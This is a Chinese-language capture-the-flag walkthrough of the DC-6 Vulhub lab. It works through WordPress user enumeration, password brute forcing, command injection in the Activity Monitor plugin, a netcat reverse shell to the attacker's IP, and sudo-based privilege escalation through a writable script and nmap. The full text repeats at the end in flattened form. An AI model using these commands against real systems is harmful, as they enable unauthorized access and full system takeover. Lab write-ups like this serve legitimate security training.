Vulhub 靶场训练 DC-6解析

字数 1169 2025-08-18 11:35:46

DC-6 靶场渗透测试详细解析

环境搭建

攻击机: Kali Linux
- IP地址: 192.168.200.14
靶机: DC-6
- 初始IP未知
网络配置: 确保两台机器使用相同的网络适配器模式

信息收集阶段

1. 发现靶机IP

使用三种方法探测同网段存活主机:

# 方法1: arp扫描
arp-scan -l

# 方法2: netdiscover扫描
netdiscover -i eth0 -r 192.168.200.0/24

# 方法3: nmap ping扫描
nmap -sP 192.168.200.0/24 -T4

发现靶机IP: 192.168.200.7

2. 端口扫描与服务识别

nmap -sS -A 192.168.200.7 -p 1-65535

扫描结果:

开放端口: 80(HTTP), 22(SSH)
访问80端口发现网站被重定向到wordy

3. 配置hosts文件

在Kali的/etc/hosts文件中添加:

192.168.200.7 wordy

4. 识别CMS系统

访问网站后发现使用WordPress 5.1.1

5. 目录扫描

使用dirb扫描网站目录:

dirb http://192.168.200.7/

发现WordPress后台管理界面

漏洞利用阶段

1. WordPress用户枚举

使用wpscan枚举用户名:

wpscan --url http://wordy -e u

将发现的用户名保存到user.txt文件

2. 密码字典生成

从rockyou.txt中筛选包含"k01"的密码:

cat /usr/share/wordlists/rockyou.txt | grep k01 > pwd.txt

3. WordPress爆破登录

使用wpscan进行爆破:

wpscan --url wordy -U user.txt -P pwd.txt

成功获取凭证:

用户名: mark
密码: helpdesk01

4. 登录WordPress后台

发现两个重要线索:

网站使用了Activity Monitor工具
Activity Monitor的Tools栏存在可注入点

5. 命令注入漏洞利用

在Activity Monitor的Tools栏输入测试域名(qquhu.com)，使用Burp Suite抓包

发现管道符后的命令被执行:

qq.com | whoami

6. 反弹Shell

在Kali上开启监听:

nc -lvvp 6666

修改Burp请求为:

qq.com | nc -e /bin/bash 192.168.200.14 6666

成功获取反向连接后，升级为交互式shell:

python -c 'import pty;pty.spawn("/bin/bash")'

权限提升阶段

1. 查找敏感信息

在/home/mark目录下发现things-to-do文件，包含graham的凭据

2. SSH登录graham账户

ssh graham@192.168.200.7

3. 检查sudo权限

sudo -l

输出:

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh

4. 利用backups.sh提权

echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

成功切换到jens用户

5. 检查jens的sudo权限

sudo -l

输出:

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap

6. 利用nmap提权

创建提权脚本:

echo "os.execute('/bin/bash')" > getshell

使用nmap以root权限执行:

sudo nmap --script=getshell

成功获取root权限

获取flag

在/root目录下找到最终的flag文件

总结

本渗透测试完整流程:

网络发现 → 2. 端口扫描 → 3. Web应用识别 → 4. 目录爆破 → 5. 用户枚举 → 6. 密码爆破 → 7. 后台登录 → 8. 命令注入 → 9. 反弹Shell → 10. 信息收集 → 11. 横向移动 → 12. 权限提升 → 13. 获取flag

关键点:

WordPress用户枚举与密码爆破
Activity Monitor插件的命令注入漏洞
通过sudo权限配置的提权路径
nmap的交互模式提权技术

DC-6 靶场渗透测试详细解析环境搭建攻击机 : Kali Linux IP地址: 192.168.200.14 靶机 : DC-6 初始IP未知网络配置 : 确保两台机器使用相同的网络适配器模式信息收集阶段 1. 发现靶机IP 使用三种方法探测同网段存活主机: 发现靶机IP: 192.168.200.7 2. 端口扫描与服务识别扫描结果: 开放端口: 80(HTTP), 22(SSH) 访问80端口发现网站被重定向到wordy 3. 配置hosts文件在Kali的 /etc/hosts 文件中添加: 4. 识别CMS系统访问网站后发现使用WordPress 5.1.1 5. 目录扫描使用dirb扫描网站目录: 发现WordPress后台管理界面漏洞利用阶段 1. WordPress用户枚举使用wpscan枚举用户名: 将发现的用户名保存到user.txt文件 2. 密码字典生成从rockyou.txt中筛选包含"k01"的密码: 3. WordPress爆破登录使用wpscan进行爆破: 成功获取凭证: 用户名: mark 密码: helpdesk01 4. 登录WordPress后台发现两个重要线索: 网站使用了Activity Monitor工具 Activity Monitor的Tools栏存在可注入点 5. 命令注入漏洞利用在Activity Monitor的Tools栏输入测试域名(qquhu.com)，使用Burp Suite抓包发现管道符后的命令被执行: 6. 反弹Shell 在Kali上开启监听: 修改Burp请求为: 成功获取反向连接后，升级为交互式shell: 权限提升阶段 1. 查找敏感信息在/home/mark目录下发现things-to-do文件，包含graham的凭据 2. SSH登录graham账户 3. 检查sudo权限输出: 4. 利用backups.sh提权成功切换到jens用户 5. 检查jens的sudo权限输出: 6. 利用nmap提权创建提权脚本: 使用nmap以root权限执行: 成功获取root权限获取flag 在/root目录下找到最终的flag文件总结本渗透测试完整流程: 网络发现 → 2. 端口扫描 → 3. Web应用识别 → 4. 目录爆破 → 5. 用户枚举 → 6. 密码爆破 → 7. 后台登录 → 8. 命令注入 → 9. 反弹Shell → 10. 信息收集 → 11. 横向移动 → 12. 权限提升 → 13. 获取flag 关键点: WordPress用户枚举与密码爆破 Activity Monitor插件的命令注入漏洞通过sudo权限配置的提权路径 nmap的交互模式提权技术